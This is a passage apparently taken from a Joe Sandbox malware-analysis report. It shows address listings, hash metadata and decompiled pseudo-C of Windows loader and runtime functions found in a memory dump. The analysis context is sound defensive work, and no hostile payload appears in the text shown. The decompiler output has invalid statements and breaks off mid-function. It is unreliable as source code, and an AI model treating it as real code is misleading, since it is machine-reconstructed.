                                          0x00000000
                                          0x00000000
                                          0x01116e5f
                                          0x01116e67
                                          0x01116e77
                                          0x01116e7f
                                          0x01116e80
                                          0x01116e88
                                          0x01116e90
                                          0x01116e9f
                                          0x01116ea5
                                          0x01116ea9
                                          0x01116eb1
                                          0x01116ebf
                                          0x00000000
                                          0x00000000
                                          0x01116ecf
                                          0x01116ed3
                                          0x00000000
                                          0x00000000
                                          0x01116edb
                                          0x01116ede
                                          0x01116ee1
                                          0x01116ee8
                                          0x01116eeb
                                          0x01116eed
                                          0x01116ef0
                                          0x01116ef4
                                          0x01116ef8
                                          0x01116efc
                                          0x00000000
                                          0x00000000
                                          0x01116f0d
                                          0x01116f11
                                          0x01116f32
                                          0x01116f37
                                          0x01116f3b
                                          0x01116f3e
                                          0x01116f41
                                          0x01116f46
                                          0x00000000
                                          0x00000000
                                          0x01116f4c
                                          0x01116f50
                                          0x01116f50
                                          0x01116f54
                                          0x01116f62
                                          0x01116f65
                                          0x01116f6d
                                          0x01116f7b
                                          0x01116f7b
                                          0x01116f93
                                          0x01116f98
                                          0x01116fa0
                                          0x01116fa6
                                          0x01116fb3
                                          0x01116fb6
                                          0x01116fbf
                                          0x01116fc1
                                          0x01116fd5
                                          0x01116fda
                                          0x01116fda
                                          0x01116fdd
                                          0x01116fe2
                                          0x01116fe7
                                          0x01116feb
                                          0x01116fef
                                          0x01116ff3
                                          0x010d520c
                                          0x010d520c
                                          0x010d520f
                                          0x010d5215
                                          0x010d5234
                                          0x010d523a
                                          0x010d523a
                                          0x010d5244
                                          0x010d5245
                                          0x010d5246
                                          0x010d5251
                                          0x010d5251
                                          0x01116f13
                                          0x01116f17
                                          0x01116f17
                                          0x01116f18
                                          0x01116f1b
                                          0x01116f1f
                                          0x01116f23
                                          0x00000000
                                          0x01116f28
                                          0x010d5204
                                          0x010d5204
                                          0x010d5208
                                          0x00000000
                                          0x010d5208
                                          0x010d5185
                                          0x010d5188
                                          0x010d518a
                                          0x010d518e
                                          0x010d5195
                                          0x01116db1
                                          0x01116db5
                                          0x01116db9
                                          0x010d519b
                                          0x010d519b
                                          0x010d519e
                                          0x010d51a7
                                          0x010d51a9
                                          0x010d51a9
                                          0x010d51b5
                                          0x010d51b8
                                          0x010d51bb
                                          0x010d51be
                                          0x010d51c1
                                          0x010d51c5
                                          0x010d51c9
                                          0x010d51cd
                                          0x010d51cd
                                          0x010d51d8
                                          0x010d51dc
                                          0x010d51e0
                                          0x01116dcc
                                          0x01116dd0
                                          0x01116dd5
                                          0x01116ddd
                                          0x01116de1
                                          0x01116de1
                                          0x01116de5
                                          0x01116deb
                                          0x01116df1
                                          0x01116df7
                                          0x01116dfd
                                          0x01116e01
                                          0x01116e05
                                          0x01116e09
                                          0x01116e0d
                                          0x01116e11
                                          0x01116e11
                                          0x010d51eb
                                          0x01116e1a
                                          0x01116e1f
                                          0x01116e21
                                          0x01116e23
                                          0x00000000
                                          0x010d51f1
                                          0x010d51f1
                                          0x00000000
                                          0x010d51f1

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 142e52419e2ba9e13ef3b5dc677ae6613bc862b093080c866f92b2f2ffd2376a
                                          • Instruction ID: bbbc50d89b07813915920ea6dbbf393f249c099108556d0f21c145d6910eea14
                                          • Opcode Fuzzy Hash: 142e52419e2ba9e13ef3b5dc677ae6613bc862b093080c866f92b2f2ffd2376a
                                          • Instruction Fuzzy Hash: AEC1FF755093818FD358CF28C580A6AFBF1BB89304F184A6EF9D98B392D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D03E2 Relevance: .3, Instructions: 254COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E010D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x119d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E010D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E010EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E010BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1197c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E010C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E010C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01127016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E010E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E011269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1197c04 != 0) {
						_t118 = _v12;
						_t120 = E0112A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1197bd8;
						if( *0x1197bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E010E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E010E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01123540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E010AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E010EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1198474 - 3;
										if( *0x1198474 != 3) {
											 *0x11979dc =  *0x11979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E010C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E010C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01127016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1198708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1197b00; // 0x0
							asm("ror esi, cl");
							 *0x119b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E010E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E010B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                          0x010d03f1
                                          0x010d03f7
                                          0x010d03f9
                                          0x010d03fb
                                          0x010d03fd
                                          0x010d0400
                                          0x010d040a
                                          0x01114c7a
                                          0x010d0537
                                          0x010d0547
                                          0x010d0410
                                          0x010d0410
                                          0x010d0414
                                          0x010d0417
                                          0x010d041a
                                          0x010d0421
                                          0x010d0424
                                          0x010d042b
                                          0x010d043b
                                          0x010d043e
                                          0x010d043f
                                          0x010d043f
                                          0x010d0446
                                          0x010d0449
                                          0x010d044c
                                          0x010d044f
                                          0x010d0459
                                          0x01114c8d
                                          0x010d045f
                                          0x010d045f
                                          0x010d045f
                                          0x010d0467
                                          0x01114c97
                                          0x01114c9d
                                          0x01114ca4
                                          0x01114caa
                                          0x01114caf
                                          0x01114cb1
                                          0x01114cc3
                                          0x01114cb3
                                          0x01114cbc
                                          0x01114cbc
                                          0x01114cc8
                                          0x01114ccb
                                          0x01114cd7
                                          0x01114cda
                                          0x01114cdf
                                          0x01114cdf
                                          0x01114ccb
                                          0x01114ca4
                                          0x010d046d
                                          0x010d046f
                                          0x010d046f
                                          0x010d0471
                                          0x010d0476
                                          0x010d047a
                                          0x010d047b
                                          0x010d0483
                                          0x010d0489
                                          0x010d048d
                                          0x00000000
                                          0x00000000
                                          0x01114ce9
                                          0x01114cef
                                          0x01114d22
                                          0x01114d22
                                          0x00000000
                                          0x01114d22
                                          0x01114cf1
                                          0x01114cf7
                                          0x00000000
                                          0x00000000
                                          0x01114cf9
                                          0x01114cff
                                          0x00000000
                                          0x00000000
                                          0x01114d05
                                          0x01114d07
                                          0x00000000
                                          0x00000000
                                          0x01114d0d
                                          0x01114d0f
                                          0x01114d14
                                          0x01114d16
                                          0x00000000
                                          0x00000000
                                          0x01114d1c
                                          0x01114d1c
                                          0x010d0499
                                          0x010d0535
                                          0x010d0535
                                          0x00000000
                                          0x010d0535
                                          0x010d04a6
                                          0x01114d2c
                                          0x01114d37
                                          0x01114d39
                                          0x01114d3b
                                          0x00000000
                                          0x00000000
                                          0x01114d41
                                          0x01114d48
                                          0x010d0527
                                          0x010d052b
                                          0x010d052d
                                          0x010d0530
                                          0x010d0530
                                          0x00000000
                                          0x010d052b
                                          0x01114d4e
                                          0x010d04ac
                                          0x010d04ac
                                          0x010d04af
                                          0x010d04b2
                                          0x010d04b7
                                          0x010d04b9
                                          0x010d04bb
                                          0x010d04bd
                                          0x010d04bf
                                          0x010d04c5
                                          0x010d04c9
                                          0x01114d53
                                          0x01114d59
                                          0x01114db9
                                          0x01114dba
                                          0x01114dbf
                                          0x01114dc2
                                          0x01114dc4
                                          0x01114dc7
                                          0x01114dce
                                          0x00000000
                                          0x01114dce
                                          0x01114d5b
                                          0x01114d61
                                          0x00000000
                                          0x00000000
                                          0x01114d63
                                          0x01114d69
                                          0x00000000
                                          0x00000000
                                          0x01114d6b
                                          0x01114d6e
                                          0x01114d74
                                          0x01114d76
                                          0x01114d7c
                                          0x01114d7e
                                          0x01114d84
                                          0x01114d89
                                          0x01114d8c
                                          0x01114d8d
                                          0x01114d92
                                          0x01114d95
                                          0x01114d96
                                          0x01114d98
                                          0x01114d9a
                                          0x01114d9f
                                          0x01114da4
                                          0x01114da6
                                          0x01114da8
                                          0x01114daf
                                          0x01114db1
                                          0x01114db1
                                          0x01114daf
                                          0x01114da6
                                          0x01114d84
                                          0x01114d7c
                                          0x00000000
                                          0x01114d74
                                          0x010d04d6
                                          0x01114de1
                                          0x010d04dc
                                          0x010d04dc
                                          0x010d04dc
                                          0x010d04e4
                                          0x01114deb
                                          0x01114df1
                                          0x01114df8
                                          0x01114dfe
                                          0x01114e03
                                          0x01114e05
                                          0x01114e17
                                          0x01114e07
                                          0x01114e10
                                          0x01114e10
                                          0x01114e1c
                                          0x01114e1f
                                          0x01114e35
                                          0x01114e35
                                          0x01114e1f
                                          0x01114df8
                                          0x010d04f1
                                          0x010d04fa
                                          0x01114e3f
                                          0x01114e47
                                          0x01114e5b
                                          0x01114e61
                                          0x01114e67
                                          0x01114e69
                                          0x01114e71
                                          0x01114e73
                                          0x010d0500
                                          0x010d0500
                                          0x010d0500
                                          0x010d04fa
                                          0x010d0508
                                          0x010d051d
                                          0x010d051d
                                          0x010d051f
                                          0x010d0524
                                          0x00000000
                                          0x010d0524
                                          0x010d0515
                                          0x010d0517
                                          0x01114e7a
                                          0x01114e7c
                                          0x00000000
                                          0x00000000
                                          0x01114e85
                                          0x00000000
                                          0x01114e85
                                          0x00000000
                                          0x010d0517

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a67bb24277ef99bfe377b9ca903900590a70a347dfe050a57bef5b2e7436f5b5
                                          • Instruction ID: 60f11cca91a2741ed7cfef67e2d7f220aae00b45f310201ce1597c0b06ac935d
                                          • Opcode Fuzzy Hash: a67bb24277ef99bfe377b9ca903900590a70a347dfe050a57bef5b2e7436f5b5
                                          • Instruction Fuzzy Hash: C1912671E003159FEF359B6CC844BAEBBE4AB01B24F050275FAA5A76D9DB749C40CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AC600 Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E010AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x119d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E010B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E010EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1197b9c; // 0x0
					_t74 = L010C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E010E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L010C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E010EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E010E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L010C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E010E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                          0x010ac608
                                          0x010ac615
                                          0x010ac625
                                          0x010ac62d
                                          0x010ac635
                                          0x010ac640
                                          0x010ac680
                                          0x010ac687
                                          0x010ac688
                                          0x010ac689
                                          0x010ac694
                                          0x010ac694
                                          0x010ac642
                                          0x010ac64a
                                          0x010ac697
                                          0x01117a25
                                          0x01117a2b
                                          0x01117a2e
                                          0x01117a30
                                          0x01117bea
                                          0x01117bea
                                          0x00000000
                                          0x01117bea
                                          0x01117a36
                                          0x01117a43
                                          0x01117a48
                                          0x01117a4c
                                          0x01117a4e
                                          0x00000000
                                          0x00000000
                                          0x01117a58
                                          0x01117a5a
                                          0x01117a5b
                                          0x01117a5c
                                          0x01117a5d
                                          0x01117a63
                                          0x01117a64
                                          0x01117a6a
                                          0x01117a6c
                                          0x01117a6e
                                          0x011179cb
                                          0x011179cb
                                          0x011179ce
                                          0x011179d0
                                          0x01117a98
                                          0x01117a9b
                                          0x01117a9b
                                          0x01117a9e
                                          0x01117aa1
                                          0x01117bbe
                                          0x01117bbe
                                          0x01117bc0
                                          0x01117be0
                                          0x01117be0
                                          0x01117a01
                                          0x01117a01
                                          0x01117a05
                                          0x01117a07
                                          0x01117a15
                                          0x01117a15
                                          0x01117a1a
                                          0x00000000
                                          0x01117a1a
                                          0x01117bc2
                                          0x01117bc6
                                          0x01117bc9
                                          0x01117bcd
                                          0x01117bcf
                                          0x011179e6
                                          0x011179e6
                                          0x011179eb
                                          0x011179eb
                                          0x011179ef
                                          0x011179f1
                                          0x00000000
                                          0x00000000
                                          0x011179f3
                                          0x011179f5
                                          0x011179ff
                                          0x011179ff
                                          0x00000000
                                          0x011179ff
                                          0x011179f7
                                          0x011179fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011179fd
                                          0x01117bd5
                                          0x01117bd8
                                          0x00000000
                                          0x00000000
                                          0x01117ba9
                                          0x01117bac
                                          0x01117bb0
                                          0x01117bb1
                                          0x01117bb1
                                          0x01117bb6
                                          0x00000000
                                          0x01117bb6
                                          0x01117aa7
                                          0x01117aaa
                                          0x00000000
                                          0x00000000
                                          0x01117ab2
                                          0x01117ab3
                                          0x01117ab5
                                          0x01117aec
                                          0x01117aef
                                          0x01117b25
                                          0x01117b28
                                          0x01117b62
                                          0x01117b64
                                          0x01117b8f
                                          0x01117b92
                                          0x01117b96
                                          0x01117b98
                                          0x00000000
                                          0x00000000
                                          0x01117b9e
                                          0x01117b9f
                                          0x01117ba3
                                          0x00000000
                                          0x01117ba3
                                          0x01117b66
                                          0x01117b68
                                          0x01117ae2
                                          0x01117ae2
                                          0x00000000
                                          0x01117ae2
                                          0x01117b6e
                                          0x01117b72
                                          0x01117b75
                                          0x01117b81
                                          0x01117b85
                                          0x01117b87
                                          0x00000000
                                          0x00000000
                                          0x01117b31
                                          0x01117b34
                                          0x01117b3c
                                          0x01117b45
                                          0x01117b46
                                          0x01117b4f
                                          0x01117b51
                                          0x01117b57
                                          0x01117b59
                                          0x01117b59
                                          0x00000000
                                          0x01117b59
                                          0x01117b77
                                          0x00000000
                                          0x01117b77
                                          0x01117b2a
                                          0x00000000
                                          0x01117b2a
                                          0x01117af1
                                          0x01117af3
                                          0x00000000
                                          0x00000000
                                          0x01117afb
                                          0x01117afc
                                          0x01117afe
                                          0x00000000
                                          0x00000000
                                          0x01117b00
                                          0x01117b03
                                          0x00000000
                                          0x00000000
                                          0x01117b05
                                          0x01117b09
                                          0x01117b0d
                                          0x01117b0f
                                          0x00000000
                                          0x00000000
                                          0x01117b18
                                          0x01117b1d
                                          0x00000000
                                          0x01117b1d
                                          0x01117ab7
                                          0x01117ab9
                                          0x00000000
                                          0x00000000
                                          0x01117abf
                                          0x01117ac1
                                          0x00000000
                                          0x00000000
                                          0x01117ac3
                                          0x01117ac6
                                          0x00000000
                                          0x00000000
                                          0x01117ac8
                                          0x01117acc
                                          0x01117ad0
                                          0x01117ad2
                                          0x00000000
                                          0x00000000
                                          0x01117adb
                                          0x00000000
                                          0x01117adb
                                          0x011179d6
                                          0x011179d9
                                          0x011179dc
                                          0x01117a91
                                          0x01117a94
                                          0x00000000
                                          0x01117a94
                                          0x011179e2
                                          0x00000000
                                          0x011179e2
                                          0x01117a74
                                          0x01117a7a
                                          0x00000000
                                          0x00000000
                                          0x01117a8a
                                          0x01117a21
                                          0x01117a21
                                          0x00000000
                                          0x01117a21
                                          0x010ac650
                                          0x010ac651
                                          0x010ac656
                                          0x010ac65c
                                          0x010ac65d
                                          0x010ac663
                                          0x010ac664
                                          0x010ac66a
                                          0x010ac66e
                                          0x011179c5
                                          0x011179c7
                                          0x00000000
                                          0x011179c7
                                          0x010ac67a
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39c529f1abc593d396b460b9af8444bfcb894156fc0357265851fd0923a4c036
                                          • Instruction ID: 6bdcc7470d524afe58b2c8aefcb10e831b9f8868b1636c6b36db80a1b9c08f6c
                                          • Opcode Fuzzy Hash: 39c529f1abc593d396b460b9af8444bfcb894156fc0357265851fd0923a4c036
                                          • Instruction Fuzzy Hash: 4E81A7766042158FDB2ACE58C480A7AF7E5FB84350F19483DEE459B389D730ED44CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113B8D0 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0113B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1197b9c; // 0x0
				_t124 = L010C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E010E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E010E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E010E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L010C77F0();
								return _t122;
							}
